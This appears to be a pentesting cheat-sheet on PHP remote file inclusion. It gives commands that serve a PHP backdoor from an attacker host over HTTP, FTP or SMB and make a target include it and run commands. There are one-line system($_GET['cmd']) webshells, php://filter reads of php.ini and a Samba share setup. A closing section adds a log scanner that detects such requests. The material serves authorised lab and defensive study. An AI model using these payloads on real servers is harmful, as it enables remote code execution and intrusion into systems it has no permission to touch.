### Intro
- *RFI*s can be discovered using the same techniques covered in *Directory Traversal* and *LFI*.
- *RFI*s are less common than *LFI*s since the target system must be configured in a specific way.
- The *allow_url_include* option needs to be enabled to leverage an RFI, just as with the `data://` wrapper from the *LFI* section.
- While *LFI*s can be used to include local files, *RFI*s allow us to include files from a remote system over *HTTP* or *SMB*.

### PHP Webshells
- `/usr/share/webshells/php`

### Exploit
- To leverage an *RFI*, we need to make the remote file accessible by the target system.

```bash
# web server running with /usr/share/webshells/php as its current directory
kali@kali:/usr/share/webshells/php/$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

# curl to include the hosted file via HTTP
curl "http://example.com/wook/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"
```

### Verify RFI

```bash
# request URL (not a shell command): read php.ini through the php://filter wrapper
http://$IP:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

# decode the returned base64 and check the setting
echo '<base64>' | base64 -d | grep allow_url_include
```

```bash
# request path: include a URL on the target's own loopback address
/index.php?language=http://127.0.0.1:80/index.php
```

### HTTP + PHP

```php
<?php phpinfo(); ?>
<?php system('whoami'); ?>
<?php system($_GET['cmd']); ?>
```

```bash
# quote the heredoc delimiter so the shell does not expand $_ inside the PHP code
cat << 'EOF' > shell.php
<?php system($_GET['cmd']); ?>
EOF
```

### FTP

```bash
sudo python -m pyftpdlib -p 21

# value for the include parameter (not a shell command)
ftp://<IP>/shell.php&cmd=id

# if the server requires valid authentication
curl '.../index.php?language=ftp://user:pass@localhost/shell.php&cmd=id'
```

### Samba SMB server > RFI

If the vulnerable web application is hosted on a Windows server, the `allow_url_include` setting does not need to be enabled for the RFI exploit, because we can use SMB for the RFI. This is because Windows treats files on remote SMB servers as normal files, which can be referenced directly with a UNC path.
##### 1

```bash
impacket-smbserver -smb2support share $(pwd)

# request path (not a shell command): UNC path as the include parameter
/index.php?language=\\<IP>\share\shell.php&cmd=whoami
```

##### 2

```ini
# Samba share definition (smb.conf)
[wook]
path = /home/kali/wook
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
```

```bash
# change the directory and run the commands
cd /home/kali/wook
chmod 0555 /home/kali/wook
sudo chown -R nobody:nogroup /home/kali/wook
```

```bash
sudo service smbd restart
```

```bash
# check if our server is running
smbmap -H <my_IP>
```
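
### Detection

From the defender's side, every request on this page has the same shape: a query parameter whose value starts with a URL scheme, a PHP wrapper, or a UNC path. The following is an added example, not part of the original notes, that flags those values in web server access logs; the function names, labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Value prefixes seen in this page's requests (https added as the obvious sibling).
REMOTE_PREFIXES = {
    "http://": "http", "https://": "http", "ftp://": "ftp",
    "php://": "php-wrapper", "data://": "data-wrapper", "\\\\": "unc-smb",
}
# Request target inside a common/combined log format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify_value(value):
    """Label a parameter value that looks like a remote include, else None.

    Decodes up to three more times so double-encoded schemes are still seen.
    """
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    lowered = value.strip().lower()
    for prefix, label in REMOTE_PREFIXES.items():
        if lowered.startswith(prefix):
            return label
    return None


def scan_line(line):
    """Return [(param, label)] for each suspicious query parameter in a log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    pairs = parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True)
    return [(name, lab) for name, val in pairs if (lab := classify_value(val))]


# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=http://198.51.100.9/x.php&cmd=id HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=ftp://user:pass@198.51.100.9/x.php&cmd=id HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?language=%5C%5C198.51.100.9%5Cshare%5Cx.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=%2568ttp%253A%252F%252F198.51.100.9%252Fx.php HTTP/1.1" 200 512',
    '203.0.113.8 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?page=about&lang=en HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry), entry.split('"')[1])
```

To cut false positives from legitimate redirect or callback parameters, restrict the check to the parameter names that actually reach `include()` in the application.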